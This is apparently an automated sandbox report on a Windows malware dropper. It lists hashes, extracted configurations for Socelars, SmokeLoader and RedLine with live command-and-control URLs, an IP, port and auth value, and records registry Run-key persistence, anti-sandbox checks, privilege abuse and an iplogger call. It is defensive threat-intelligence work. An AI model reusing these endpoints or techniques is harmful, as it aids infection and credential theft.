Analysis
max time kernel: 97s
max time network: 161s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 10-03-2022 01:04

Static task: static1

Behavioral task: behavioral1
Sample: 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
Resource: win7-en-20211208

Behavioral task: behavioral2
Sample: 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
Resource: win10v2004-en-20220113

General
Target: 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
Size: 4.2MB
MD5: e2138394ca78efa23b9f0cdd9677be1b
SHA1: 592ad509f071682a32949a30c6c5121cea6b071e
SHA256: 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589
SHA512: 1121fb5ae305cb0930db7c7beb312bb831fbe8f29966fde851c422766a9eafde4209f32a7df17e5bb87a8690b9e78b9a9f75fe6133e67835a381fa2310098266

Malware Config

Extracted: socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/

Extracted: smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/

Extracted: redline
dadad123
86.107.197.196:63065
auth_value: dd4834614a3ac04a7b90791c224626a2

Signatures

DcRat 12 IoCs
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
pid | process
5904 | schtasks.exe
5824 | schtasks.exe
5908 | schtasks.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" | pzyh.exe
1016 | schtasks.exe
5284 | schtasks.exe
5900 | schtasks.exe
1608 | schtasks.exe
6004 | schtasks.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe
2256 | schtasks.exe
6052 | schtasks.exe

OnlyLogger
A tiny loader that uses IPLogger to get its payload.

Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5084 | 4444 | rUNdlL32.eXe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1016 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5900 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5904 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5824 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2256 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6052 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5284 | 4444 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6004 | 4444 | schtasks.exe |

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 11 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4700-377-0x0000000000DB0000-0x0000000001112000-memory.dmp | family_redline
behavioral2/memory/4700-388-0x0000000000DB0000-0x0000000001112000-memory.dmp | family_redline
behavioral2/memory/5264-393-0x0000000000EC0000-0x0000000001205000-memory.dmp | family_redline
behavioral2/memory/5264-402-0x0000000000EC0000-0x0000000001205000-memory.dmp | family_redline
behavioral2/memory/4700-403-0x0000000000DB0000-0x0000000001112000-memory.dmp | family_redline
behavioral2/memory/5232-395-0x0000000000420000-0x0000000000440000-memory.dmp | family_redline
behavioral2/memory/5264-415-0x0000000000EC0000-0x0000000001205000-memory.dmp | family_redline
behavioral2/memory/5264-413-0x0000000000EC0000-0x0000000001205000-memory.dmp | family_redline
behavioral2/memory/4700-405-0x0000000000DB0000-0x0000000001112000-memory.dmp | family_redline
behavioral2/memory/4076-459-0x0000000000170000-0x00000000004A7000-memory.dmp | family_redline
behavioral2/memory/4700-379-0x0000000000DB0000-0x0000000001112000-memory.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Installation.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\Installation.exe | family_socelars

suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
OnlyLogger Payload 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4972-161-0x0000000000400000-0x00000000009B8000-memory.dmp | family_onlylogger
behavioral2/memory/4972-160-0x00000000001C0000-0x00000000001F0000-memory.dmp | family_onlylogger
behavioral2/memory/5620-430-0x0000000000840000-0x0000000000884000-memory.dmp | family_onlylogger
behavioral2/memory/5620-428-0x0000000000400000-0x0000000000492000-memory.dmp | family_onlylogger

Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
281 | 5264 | cmd.exe

Downloads MZ/PE file

Executes dropped EXE 42 IoCs
Processes:
pid | process
2752 | Files.exe
4972 | Install.exe
4996 | KRSetp.exe
3944 | jg3_3uag.exe
436 | File.exe
4892 | Folder.exe
2612 | Installation.exe
4216 | pzyh.exe
2912 | pub2.exe
4716 | Folder.exe
1076 | Infos.exe
2924 | jfiag3g_gg.exe
3648 | jfiag3g_gg.exe
3112 | IDgzLzkXcK21aBlMOtzETzcZ.exe
4700 | PWhSdaGNWZZnS8BjtCCZ9pOe.exe
4940 | zIlVU7ZogqbWpTqmVJGYv0Hh.exe
1300 | apIafuakphKdmwhIYaWc_mP4.exe
2948 | LJJlylsdlerbUUgUBlj_im4E.exe
5224 | NmgYea8Ed5HpZgfZ6I_SyvV4.exe
5232 | PdMWUMUBDQaqgneMz4NAMEXR.exe
5240 | VFoNhG_Zeh0WXQxnBSFaZqAE.exe
5248 | jmgtfwUdHp9OjWiA1hv55jGD.exe
5256 | o7QhAXhuoJQjnxTdsdJdasfg.exe
5264 | UxHD8WD6JzNKv1lcW6m7Keaj.exe
5272 | 8yPhCVbCi1c8XIP1eciLPkHT.exe
5320 | V0CoOL90dCA2Fs9BKr5ffDlp.exe
5444 | e8ds_0qOcrUahz4Yjq0aLvxh.exe
5620 | 6WoEM1C6fgCRhgUAcZHi2POU.exe
5692 | j9JoI22bTxWmSEp1Dm9hS1RV.exe
5756 | drecFYoUAZwZKDsRAB33WXoF.exe
5936 | 3pobJdeTncHRVAMa5wc46se6.exe
6032 | gtGhkMGggyQ8QkD_Z3jVqai0.exe
4076 | BDJG9.exe
5556 | Install.exe
208 | 7EEH0.exe
4568 | 1eb3a752-4420-4367-bdec-0407d20e9dc0.exe
4888 | 7I4LD.exe
5508 | 9KGM4.exe
5800 | Install.exe
4476 | 76G9I.exe
5816 | 76G9IJMD201BBH1.exe
5752 | gtGhkMGggyQ8QkD_Z3jVqai0.exe

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe | vmprotect
behavioral2/memory/3944-142-0x0000000000400000-0x000000000063D000-memory.dmp | vmprotect

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe

Checks computer location settings 2 TTPs 6 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Files.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Folder.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Infos.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | jmgtfwUdHp9OjWiA1hv55jGD.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | e8ds_0qOcrUahz4Yjq0aLvxh.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe

Loads dropped DLL 25 IoCs
Processes:
pid | process
2912 | pub2.exe
4332 | rundll32.exe
2948 | LJJlylsdlerbUUgUBlj_im4E.exe (×11)
5256 | o7QhAXhuoJQjnxTdsdJdasfg.exe (×11)
5320 | V0CoOL90dCA2Fs9BKr5ffDlp.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application 2 TTPs 11 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\identity_helper = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\telclient\\identity_helper.exe\"" |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\wscinterop\\RuntimeBroker.exe\"" |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Public\\Libraries\\dllhost.exe\"" |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\8yPhCVbCi1c8XIP1eciLPkHT = "\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\8yPhCVbCi1c8XIP1eciLPkHT.exe\"" |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gtGhkMGggyQ8QkD_Z3jVqai0 = "\"C:\\odt\\gtGhkMGggyQ8QkD_Z3jVqai0.exe\"" |
Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" | 9KGM4.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" | pzyh.exe
Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Recovery\\WindowsRE\\msedge.exe\"" |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\gtGhkMGggyQ8QkD_Z3jVqai0 = "\"C:\\Users\\Admin\\Documents\\8yPhCVbCi1c8XIP1eciLPkHT\\gtGhkMGggyQ8QkD_Z3jVqai0.exe\"" |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files (x86)\\Microsoft\\Temp\\smss.exe\"" |

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jg3_3uag.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
245 | ipinfo.io
259 | ipinfo.io
13 | ip-api.com
15 | ipinfo.io
16 | ipinfo.io
244 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe | autoit_exe

Drops file in System32 directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\SysWOW64\wscinterop\RuntimeBroker.exe |
File created | C:\Windows\SysWOW64\wscinterop\9e8d7a4ca61bd9 |

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
pid | process
4700 | PWhSdaGNWZZnS8BjtCCZ9pOe.exe
5264 | UxHD8WD6JzNKv1lcW6m7Keaj.exe
1300 | apIafuakphKdmwhIYaWc_mP4.exe
5936 | 3pobJdeTncHRVAMa5wc46se6.exe
1300 | apIafuakphKdmwhIYaWc_mP4.exe
4076 | BDJG9.exe
208 | 7EEH0.exe
4888 | 7I4LD.exe
5508 | 9KGM4.exe
1300 |
5752 | gtGhkMGggyQ8QkD_Z3jVqai0.exe
1300 |
5752 | gtGhkMGggyQ8QkD_Z3jVqai0.exe

Drops file in Program Files directory 9 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\Common Files\Java\Java Update\9d0f9fa3bacf8c |
File created | C:\Program Files (x86)\Microsoft\Temp\smss.exe |
File created | C:\Program Files (x86)\Microsoft\Temp\69ddcba757bf72 |
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310192856.pma | setup.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\identity_helper.exe | apIafuakphKdmwhIYaWc_mP4.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\1c7346099e1d63 | apIafuakphKdmwhIYaWc_mP4.exe
File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3ff80b0c-1114-450e-8e0b-56d36e7a9174.tmp | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\identity_helper.exe | apIafuakphKdmwhIYaWc_mP4.exe
File created | C:\Program Files (x86)\Common Files\Java\Java Update\8yPhCVbCi1c8XIP1eciLPkHT.exe |

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 28 IoCs
Processes:
pid | pid_target | process | target process
3476 | 4972 | WerFault.exe | Install.exe
1404 | 4972 | WerFault.exe | Install.exe
5056 | 4332 | WerFault.exe | rundll32.exe
3476 | 4972 | WerFault.exe | Install.exe
3708 | 4972 | WerFault.exe | Install.exe
5092 | 4972 | WerFault.exe | Install.exe
452 | 4972 | WerFault.exe | Install.exe
2948 | 4972 | WerFault.exe | Install.exe
1380 | 4972 | WerFault.exe | Install.exe
5368 | 3112 | WerFault.exe | IDgzLzkXcK21aBlMOtzETzcZ.exe
5632 | 4940 | WerFault.exe | zIlVU7ZogqbWpTqmVJGYv0Hh.exe
3356 | 5224 | WerFault.exe |
6012 | 5240 | WerFault.exe | VFoNhG_Zeh0WXQxnBSFaZqAE.exe
2800 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
5824 | 5272 | WerFault.exe |
5676 | 5240 | WerFault.exe | VFoNhG_Zeh0WXQxnBSFaZqAE.exe
5576 | 5224 | WerFault.exe |
3140 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
3332 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
2256 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
728 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
4672 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
6092 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
3440 | 5620 | WerFault.exe | 6WoEM1C6fgCRhgUAcZHi2POU.exe
1916 | 1372 | WerFault.exe | explorer.exe
5264 | 4972 | WerFault.exe | Install.exe
3440 | 4972 | WerFault.exe | Install.exe
4076 | 5196 | WerFault.exe | notepad.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe

Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | o7QhAXhuoJQjnxTdsdJdasfg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | LJJlylsdlerbUUgUBlj_im4E.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | LJJlylsdlerbUUgUBlj_im4E.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | o7QhAXhuoJQjnxTdsdJdasfg.exe

Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
5908 | schtasks.exe
1016 | schtasks.exe
2256 | schtasks.exe
6052 | schtasks.exe
5284 | schtasks.exe
6004 | schtasks.exe
1608 | schtasks.exe
5900 | schtasks.exe
5904 | schtasks.exe
5824 | schtasks.exe

Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
5172 | timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
pid | process
5380 | tasklist.exe
5900 | tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe

Kills process with taskkill 3 IoCs
Processes:
pid | process
3224 | taskkill.exe
4068 | taskkill.exe
4576 | taskkill.exe

Modifies registry class 4 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ |
Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ |

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
2912 | pub2.exe (×2)
4548 | msedge.exe (×2)
1068 | msedge.exe (×2)
4504 | msedge.exe (×2)
3032 | (×18)
3648 | jfiag3g_gg.exe (×2)
3032 | (×36)

Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid | process
2912 | pub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
pid | process
4504 | msedge.exe (×5)

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4996 | KRSetp.exe
Token: SeCreateTokenPrivilege | 2612 | Installation.exe
Token: SeAssignPrimaryTokenPrivilege | 2612 | Installation.exe
Token: SeLockMemoryPrivilege | 2612 | Installation.exe
Token: SeIncreaseQuotaPrivilege | 2612 | Installation.exe
Token: SeMachineAccountPrivilege | 2612 | Installation.exe
Token: SeTcbPrivilege | 2612 | Installation.exe
Token: SeSecurityPrivilege | 2612 | Installation.exe
Token: SeTakeOwnershipPrivilege | 2612 | Installation.exe
Token: SeLoadDriverPrivilege | 2612 | Installation.exe
Token: SeSystemProfilePrivilege | 2612 | Installation.exe
Token: SeSystemtimePrivilege | 2612 | Installation.exe
Token: SeProfSingleProcessPrivilege | 2612 | Installation.exe
Token: SeIncBasePriorityPrivilege | 2612 | Installation.exe
Token: SeCreatePagefilePrivilege | 2612 | Installation.exe
Token: SeCreatePermanentPrivilege | 2612 | Installation.exe
Token: SeBackupPrivilege | 2612 | Installation.exe
Token: SeRestorePrivilege | 2612 | Installation.exe
Token: SeShutdownPrivilege | 2612 | Installation.exe
Token: SeDebugPrivilege | 2612 | Installation.exe
Token: SeAuditPrivilege | 2612 | Installation.exe
Token: SeSystemEnvironmentPrivilege | 2612 | Installation.exe
Token: SeChangeNotifyPrivilege | 2612 | Installation.exe
Token: SeRemoteShutdownPrivilege | 2612 | Installation.exe
Token: SeUndockPrivilege | 2612 | Installation.exe
Token: SeSyncAgentPrivilege | 2612 | Installation.exe
Token: SeEnableDelegationPrivilege | 2612 | Installation.exe
Token: SeManageVolumePrivilege | 2612 | Installation.exe
Token: SeImpersonatePrivilege | 2612 | Installation.exe
Token: SeCreateGlobalPrivilege | 2612 | Installation.exe
Token: 31 | 2612 | Installation.exe
Token: 32 | 2612 | Installation.exe
Token: 33 | 2612 | Installation.exe
Token: 34 | 2612 | Installation.exe
Token: 35 | 2612 | Installation.exe
Token: SeShutdownPrivilege | 3032 | (this row and the next alternate, 3 pairs)
Token: SeCreatePagefilePrivilege | 3032 |
Token: SeDebugPrivilege | 3224 | taskkill.exe
Token: SeShutdownPrivilege | 3032 | (this row and the next alternate, 10 pairs)
Token: SeCreatePagefilePrivilege | 3032 |
Token: SeTcbPrivilege | 4044 | svchost.exe (×2)

Suspicious use of FindShellTrayWindow 13 IoCs
Processes:
pid | process
436 | File.exe (×6)
4504 | msedge.exe
3032 |
4504 | msedge.exe
3032 | (×4)

Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid | process
436 | File.exe (×6)

Suspicious use of SetWindowsHookEx 27 IoCs
Processes:
pid | process
1076 | Infos.exe
4700 | PWhSdaGNWZZnS8BjtCCZ9pOe.exe
3112 | IDgzLzkXcK21aBlMOtzETzcZ.exe
1300 | apIafuakphKdmwhIYaWc_mP4.exe
4940 | zIlVU7ZogqbWpTqmVJGYv0Hh.exe
1300 | apIafuakphKdmwhIYaWc_mP4.exe
2948 | LJJlylsdlerbUUgUBlj_im4E.exe
5248 | jmgtfwUdHp9OjWiA1hv55jGD.exe
5264 | UxHD8WD6JzNKv1lcW6m7Keaj.exe
5320 | V0CoOL90dCA2Fs9BKr5ffDlp.exe
5240 | VFoNhG_Zeh0WXQxnBSFaZqAE.exe
5224 | NmgYea8Ed5HpZgfZ6I_SyvV4.exe
5756 | drecFYoUAZwZKDsRAB33WXoF.exe
5256 | o7QhAXhuoJQjnxTdsdJdasfg.exe
5272 | 8yPhCVbCi1c8XIP1eciLPkHT.exe
5936 | 3pobJdeTncHRVAMa5wc46se6.exe
4076 | BDJG9.exe
5556 | Install.exe
208 | 7EEH0.exe
4888 | 7I4LD.exe
5508 | 9KGM4.exe
5800 | Install.exe
4476 | 76G9I.exe
5816 | 76G9IJMD201BBH1.exe (×2)
5752 | gtGhkMGggyQ8QkD_Z3jVqai0.exe (×2)

Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 2000 wrote to memory of 2752 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | Files.exe (×3)
PID 2000 wrote to memory of 4972 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | Install.exe (×3)
PID 2000 wrote to memory of 4996 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | KRSetp.exe (×2)
PID 2000 wrote to memory of 3944 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | jg3_3uag.exe (×3)
PID 2752 wrote to memory of 436 | 2752 | Files.exe | File.exe (×3)
PID 2000 wrote to memory of 4504 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | msedge.exe (×2)
PID 2000 wrote to memory of 4892 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | Folder.exe (×3)
PID 4504 wrote to memory of 4956 | 4504 | msedge.exe | msedge.exe (×2)
PID 2000 wrote to memory of 2612 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | Installation.exe (×3)
PID 2000 wrote to memory of 4216 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | pzyh.exe (×3)
PID 2000 wrote to memory of 2912 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | pub2.exe (×3)
PID 2000 wrote to memory of 1076 | 2000 | 7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe | Infos.exe (×3)
PID 4892 wrote to memory of 4716 | 4892 | Folder.exe | Folder.exe (×3)
PID 4216 wrote to memory of 2924 | 4216 | pzyh.exe | jfiag3g_gg.exe (×3)
PID 2752 wrote to memory of 212 | 2752 | Files.exe | msedge.exe (×2)
PID 212 wrote to memory of 4668 | 212 | msedge.exe | msedge.exe (×2)
PID 4504 wrote to memory of 4992 | 4504 | msedge.exe | msedge.exe (×21)

Processes
-
C:\Users\Admin\AppData\Local\Temp\7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe"C:\Users\Admin\AppData\Local\Temp\7246fcb24909aa1f01958fac5b242f4bab05325051d8976a320f3eebcb34b589.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe639246f8,0x7ffe63924708,0x7ffe639247184⤵
-
